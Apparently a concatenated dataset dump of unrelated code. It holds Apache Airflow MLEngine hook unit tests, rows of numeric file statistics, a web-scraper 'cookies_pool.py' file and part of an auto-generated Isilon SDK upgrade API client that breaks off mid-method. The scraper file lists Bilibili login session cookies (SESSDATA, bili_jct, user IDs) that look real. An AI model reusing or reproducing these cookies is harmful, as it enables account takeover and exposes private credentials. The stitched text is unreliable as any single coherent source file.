version_names = ["AAA", "BBB", "CCC"]
versions = [{
'name': 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name),
"isDefault": i == 0
} for i, version_name in enumerate(version_names)]
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.return_value
) = operation_done
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
list.return_value.
execute.return_value
) = {"versions": versions}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
list_next.return_value
) = None
self.hook.delete_model(
project_id=project_id, model_name=model_name, delete_contents=True
)
mock_get_conn.assert_has_calls(
[
mock.call().projects().models().delete(name=model_path),
mock.call().projects().models().delete().execute()
] + [
mock.call().projects().models().versions().delete(
name='projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name),
) for version_name in version_names
],
any_order=True
)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job(self, mock_get_conn, mock_sleep):
project_id = 'test-project'
job_id = 'test-job-id'
project_path = 'projects/{}'.format(project_id)
job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
new_job = {
'jobId': job_id,
'foo': 4815162342,
}
new_job_with_airflow_version = {
'jobId': job_id,
'foo': 4815162342,
'labels': {'airflow-version': hook._AIRFLOW_VERSION}
}
job_succeeded = {
'jobId': job_id,
'state': 'SUCCEEDED',
}
job_queued = {
'jobId': job_id,
'state': 'QUEUED',
}
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.return_value
) = job_queued
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.side_effect
) = [job_queued, job_succeeded]
create_job_response = self.hook.create_job(
project_id=project_id, job=deepcopy(new_job)
)
self.assertEqual(create_job_response, job_succeeded)
mock_get_conn.assert_has_calls([
mock.call().projects().jobs().create(body=new_job_with_airflow_version, parent=project_path),
mock.call().projects().jobs().get(name=job_path),
mock.call().projects().jobs().get().execute()
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job_with_labels(self, mock_get_conn, mock_sleep):
project_id = 'test-project'
job_id = 'test-job-id'
project_path = 'projects/{}'.format(project_id)
job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
new_job = {
'jobId': job_id,
'foo': 4815162342,
'labels': {'other-label': 'test-value'}
}
new_job_with_airflow_version = {
'jobId': job_id,
'foo': 4815162342,
'labels': {
'other-label': 'test-value',
'airflow-version': hook._AIRFLOW_VERSION
}
}
job_succeeded = {
'jobId': job_id,
'state': 'SUCCEEDED',
}
job_queued = {
'jobId': job_id,
'state': 'QUEUED',
}
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.return_value
) = job_queued
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.side_effect
) = [job_queued, job_succeeded]
create_job_response = self.hook.create_job(
project_id=project_id, job=deepcopy(new_job)
)
self.assertEqual(create_job_response, job_succeeded)
mock_get_conn.assert_has_calls([
mock.call().projects().jobs().create(body=new_job_with_airflow_version, parent=project_path),
mock.call().projects().jobs().get(name=job_path),
mock.call().projects().jobs().get().execute()
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job_reuse_existing_job_by_default(self, mock_get_conn):
project_id = 'test-project'
job_id = 'test-job-id'
project_path = 'projects/{}'.format(project_id)
job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
job_succeeded = {
'jobId': job_id,
'foo': 4815162342,
'state': 'SUCCEEDED',
}
error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.side_effect
) = error_job_exists
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.return_value
) = job_succeeded
create_job_response = self.hook.create_job(
project_id=project_id, job=job_succeeded)
self.assertEqual(create_job_response, job_succeeded)
mock_get_conn.assert_has_calls([
mock.call().projects().jobs().create(body=job_succeeded, parent=project_path),
mock.call().projects().jobs().create().execute(),
mock.call().projects().jobs().get(name=job_path),
mock.call().projects().jobs().get().execute()
], any_order=True)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job_check_existing_job_failed(self, mock_get_conn):
project_id = 'test-project'
job_id = 'test-job-id'
my_job = {
'jobId': job_id,
'foo': 4815162342,
'state': 'SUCCEEDED',
'someInput': {
'input': 'someInput'
}
}
different_job = {
'jobId': job_id,
'foo': 4815162342,
'state': 'SUCCEEDED',
'someInput': {
'input': 'someDifferentInput'
}
}
error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.side_effect
) = error_job_exists
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.return_value
) = different_job
def check_input(existing_job):
return existing_job.get('someInput', None) == \
my_job['someInput']
with self.assertRaises(HttpError):
self.hook.create_job(
project_id=project_id, job=my_job,
use_existing_job_fn=check_input)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job_check_existing_job_success(self, mock_get_conn):
project_id = 'test-project'
job_id = 'test-job-id'
my_job = {
'jobId': job_id,
'foo': 4815162342,
'state': 'SUCCEEDED',
'someInput': {
'input': 'someInput'
}
}
error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.side_effect
) = error_job_exists
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.return_value
) = my_job
def check_input(existing_job):
return existing_job.get('someInput', None) == my_job['someInput']
create_job_response = self.hook.create_job(
project_id=project_id, job=my_job,
use_existing_job_fn=check_input)
self.assertEqual(create_job_response, my_job)
class TestMLEngineHookWithDefaultProjectId(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
with mock.patch(
'airflow.gcp.hooks.mlengine.MLEngineHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = hook.MLEngineHook()
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
version = {'name': version_name}
operation_path = 'projects/{}/operations/test-operation'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
create.return_value.
execute.return_value
) = version
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.return_value
) = {'name': operation_path, 'done': True}
create_version_response = self.hook.create_version(
model_name=model_name,
version_spec=version
)
self.assertEqual(create_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().create(body=version, parent=model_path),
mock.call().projects().models().versions().create().execute(),
mock.call().projects().operations().get(name=version_name),
], any_order=True)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_set_default_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
operation_path = 'projects/{}/operations/test-operation'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
version_path = 'projects/{}/models/{}/versions/{}'.format(
GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name, version_name
)
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
setDefault.return_value.
execute.return_value
) = operation_done
set_default_version_response = self.hook.set_default_version(
model_name=model_name,
version_name=version_name
)
self.assertEqual(set_default_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().setDefault(body={}, name=version_path),
mock.call().projects().models().versions().setDefault().execute()
], any_order=True)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_list_versions(self, mock_get_conn, mock_sleep, mock_project_id):
model_name = 'test-model'
model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
version_names = ['ver_{}'.format(ix) for ix in range(3)]
response_bodies = [
{
'nextPageToken': "TOKEN-{}".format(ix),
'versions': [ver]
} for ix, ver in enumerate(version_names)]
response_bodies[-1].pop('nextPageToken')
pages_requests = [
mock.Mock(**{'execute.return_value': body}) for body in response_bodies
]
versions_mock = mock.Mock(
**{'list.return_value': pages_requests[0], 'list_next.side_effect': pages_requests[1:] + [None]}
)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value
) = versions_mock
list_versions_response = self.hook.list_versions(model_name=model_name)
self.assertEqual(list_versions_response, version_names)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().list(pageSize=100, parent=model_path),
mock.call().projects().models().versions().list().execute(),
] + [
mock.call().projects().models().versions().list_next(
previous_request=pages_requests[i], previous_response=response_bodies[i]
) for i in range(3)
], any_order=True)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
operation_path = 'projects/{}/operations/test-operation'.format(
GCP_PROJECT_ID_HOOK_UNIT_TEST
)
version_path = 'projects/{}/models/{}/versions/{}'.format(
GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name, version_name
)
version = {'name': operation_path}
operation_not_done = {'name': operation_path, 'done': False}
operation_done = {'name': operation_path, 'done': True}
(
mock_get_conn.return_value.
projects.return_value.
operations.return_value.
get.return_value.
execute.side_effect
) = [operation_not_done, operation_done]
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
versions.return_value.
delete.return_value.
execute.return_value
) = version
delete_version_response = self.hook.delete_version(model_name=model_name, version_name=version_name)
self.assertEqual(delete_version_response, operation_done)
mock_get_conn.assert_has_calls([
mock.call().projects().models().versions().delete(name=version_path),
mock.call().projects().models().versions().delete().execute(),
mock.call().projects().operations().get(name=operation_path),
mock.call().projects().operations().get().execute()
], any_order=True)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
model = {
'name': model_name,
}
project_path = 'projects/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
create.return_value.
execute.return_value
) = model
create_model_response = self.hook.create_model(model=model)
self.assertEqual(create_model_response, model)
mock_get_conn.assert_has_calls([
mock.call().projects().models().create(body=model, parent=project_path),
mock.call().projects().models().create().execute()
])
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_get_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
model = {'model': model_name}
model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
get.return_value.
execute.return_value
) = model
get_model_response = self.hook.get_model(model_name=model_name)
self.assertEqual(get_model_response, model)
mock_get_conn.assert_has_calls([
mock.call().projects().models().get(name=model_path),
mock.call().projects().models().get().execute()
])
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
model = {'model': model_name}
model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
(
mock_get_conn.return_value.
projects.return_value.
models.return_value.
delete.return_value.
execute.return_value
) = model
self.hook.delete_model(model_name=model_name)
mock_get_conn.assert_has_calls([
mock.call().projects().models().delete(name=model_path),
mock.call().projects().models().delete().execute()
])
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job(self, mock_get_conn, mock_sleep, mock_project_id):
job_id = 'test-job-id'
project_path = 'projects/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
job_path = 'projects/{}/jobs/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, job_id)
new_job = {
'jobId': job_id,
'foo': 4815162342,
}
job_succeeded = {
'jobId': job_id,
'state': 'SUCCEEDED',
}
job_queued = {
'jobId': job_id,
'state': 'QUEUED',
}
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
create.return_value.
execute.return_value
) = job_queued
(
mock_get_conn.return_value.
projects.return_value.
jobs.return_value.
get.return_value.
execute.side_effect
) = [job_queued, job_succeeded]
create_job_response = self.hook.create_job(job=new_job)
self.assertEqual(create_job_response, job_succeeded)
mock_get_conn.assert_has_calls([
mock.call().projects().jobs().create(body=new_job, parent=project_path),
mock.call().projects().jobs().get(name=job_path),
mock.call().projects().jobs().get().execute()
], any_order=True)
class TestMLEngineHookWithoutProjectId(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
with mock.patch(
'airflow.gcp.hooks.mlengine.MLEngineHook.__init__',
new=mock_base_gcp_hook_no_default_project_id,
):
self.hook = hook.MLEngineHook()
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
version = {'name': version_name}
with self.assertRaises(AirflowException):
self.hook.create_version(
model_name=model_name,
version_spec=version
)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_set_default_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
with self.assertRaises(AirflowException):
self.hook.set_default_version(
model_name=model_name,
version_name=version_name
)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_list_versions(self, mock_get_conn, mock_sleep, mock_project_id):
model_name = 'test-model'
with self.assertRaises(AirflowException):
self.hook.list_versions(model_name=model_name)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_version(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
version_name = 'test-version'
with self.assertRaises(AirflowException):
self.hook.delete_version(model_name=model_name, version_name=version_name)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
model = {
'name': model_name,
}
with self.assertRaises(AirflowException):
self.hook.create_model(model=model)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_get_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
with self.assertRaises(AirflowException):
self.hook.get_model(model_name=model_name)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_delete_model(self, mock_get_conn, mock_project_id):
model_name = 'test-model'
with self.assertRaises(AirflowException):
self.hook.delete_model(model_name=model_name)
@mock.patch(
'airflow.gcp.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
@mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
def test_create_mlengine_job(self, mock_get_conn, mock_sleep, mock_project_id):
job_id = 'test-job-id'
new_job = {
'jobId': job_id,
'foo': 4815162342,
}
with self.assertRaises(AirflowException):
self.hook.create_job(job=new_job)
| 36.630728
| 108
| 0.615036
| 4,524
| 40,770
| 5.225464
| 0.049735
| 0.094924
| 0.042343
| 0.049027
| 0.933249
| 0.925846
| 0.922166
| 0.910152
| 0.892555
| 0.888156
| 0
| 0.004514
| 0.271891
| 40,770
| 1,112
| 109
| 36.663669
| 0.791848
| 0.018445
| 0
| 0.780186
| 0
| 0
| 0.137647
| 0.089298
| 0
| 0
| 0
| 0
| 0.054696
| 1
| 0.039216
| false
| 0
| 0.008256
| 0.002064
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c49f0c5a15633edcfe699fb2096659bd7082f38
| 692
|
py
|
Python
|
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
cookies_pool = [
"JSESSIONID=36B4E30CDFE059235541CC81C91743A3; bili_jct=520c3f01daf4d9732fdeb9d95586612c; SESSDATA=4b484445%2C1616518159%2Ca3c73*91; DedeUserID=416679427; sid=7r9xx2ji; buvid3=CDCFA651-49CB-4A84-B114-D107F6AD0B2E138364infoc; DedeUserID__ckMd5=a64ed305aa816673; _uuid=A60FD75F-122D-851F-7994-2DD11583170748070infoc; finger=158939783",
"JSESSIONID=F226418244D87B8BA9576F6925A77DEE; bili_jct=39e4699e907b32e2102d5bf649efc608; SESSDATA=ff19c0a2%2C1616518648%2Ca1be7*91; DedeUserID=416679530; sid=8ud5j0dx; buvid3=CDCFA651-49CB-4A84-B114-D107F6AD0B2E138364infoc; DedeUserID__ckMd5=a86b9ac2fc85db23; _uuid=98868A14-C781-7EF4-B8AB-CBF11A860D7B41053infoc; finger=158939783"
]
| 138.4
| 336
| 0.864162
| 64
| 692
| 9.203125
| 0.703125
| 0.023769
| 0.061121
| 0.074703
| 0.217317
| 0.217317
| 0.217317
| 0.217317
| 0
| 0
| 0
| 0.444109
| 0.043353
| 692
| 4
| 337
| 173
| 0.445619
| 0
| 0
| 0
| 0
| 0.5
| 0.950867
| 0.843931
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c60d2a864031e5b1cd3ff7afa47f867bcd19a1b
| 102,162
|
py
|
Python
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_8_2_2.api_client import ApiClient
class UpgradeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_cluster_add_remaining_node(self, cluster_add_remaining_node, **kwargs): # noqa: E501
"""create_cluster_add_remaining_node # noqa: E501
Let system absorb any remaining or new nodes inside the existing upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_add_remaining_node(cluster_add_remaining_node, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_add_remaining_node: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, **kwargs) # noqa: E501
return data
def create_cluster_add_remaining_node_with_http_info(self, cluster_add_remaining_node, **kwargs): # noqa: E501
"""create_cluster_add_remaining_node # noqa: E501
Let system absorb any remaining or new nodes inside the existing upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_add_remaining_node: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_add_remaining_node'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_add_remaining_node" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_add_remaining_node' is set
if ('cluster_add_remaining_node' not in params or
params['cluster_add_remaining_node'] is None):
raise ValueError("Missing the required parameter `cluster_add_remaining_node` when calling `create_cluster_add_remaining_node`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_add_remaining_node' in params:
body_params = params['cluster_add_remaining_node']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/add_remaining_nodes', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_archive_item(self, cluster_archive_item, **kwargs): # noqa: E501
"""create_cluster_archive_item # noqa: E501
Start an archive of an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_archive_item(cluster_archive_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterArchiveItem cluster_archive_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_archive_item_with_http_info(cluster_archive_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_archive_item_with_http_info(cluster_archive_item, **kwargs) # noqa: E501
return data
def create_cluster_archive_item_with_http_info(self, cluster_archive_item, **kwargs): # noqa: E501
"""create_cluster_archive_item # noqa: E501
Start an archive of an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_archive_item_with_http_info(cluster_archive_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterArchiveItem cluster_archive_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_archive_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_archive_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_archive_item' is set
if ('cluster_archive_item' not in params or
params['cluster_archive_item'] is None):
raise ValueError("Missing the required parameter `cluster_archive_item` when calling `create_cluster_archive_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_archive_item' in params:
body_params = params['cluster_archive_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/archive', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_assess_item(self, cluster_assess_item, **kwargs): # noqa: E501
"""create_cluster_assess_item # noqa: E501
Start upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_assess_item(cluster_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAssessItem cluster_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_assess_item_with_http_info(cluster_assess_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_assess_item_with_http_info(cluster_assess_item, **kwargs) # noqa: E501
return data
def create_cluster_assess_item_with_http_info(self, cluster_assess_item, **kwargs): # noqa: E501
"""create_cluster_assess_item # noqa: E501
Start upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_assess_item_with_http_info(cluster_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAssessItem cluster_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_assess_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_assess_item' is set
if ('cluster_assess_item' not in params or
params['cluster_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_assess_item` when calling `create_cluster_assess_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_assess_item' in params:
body_params = params['cluster_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
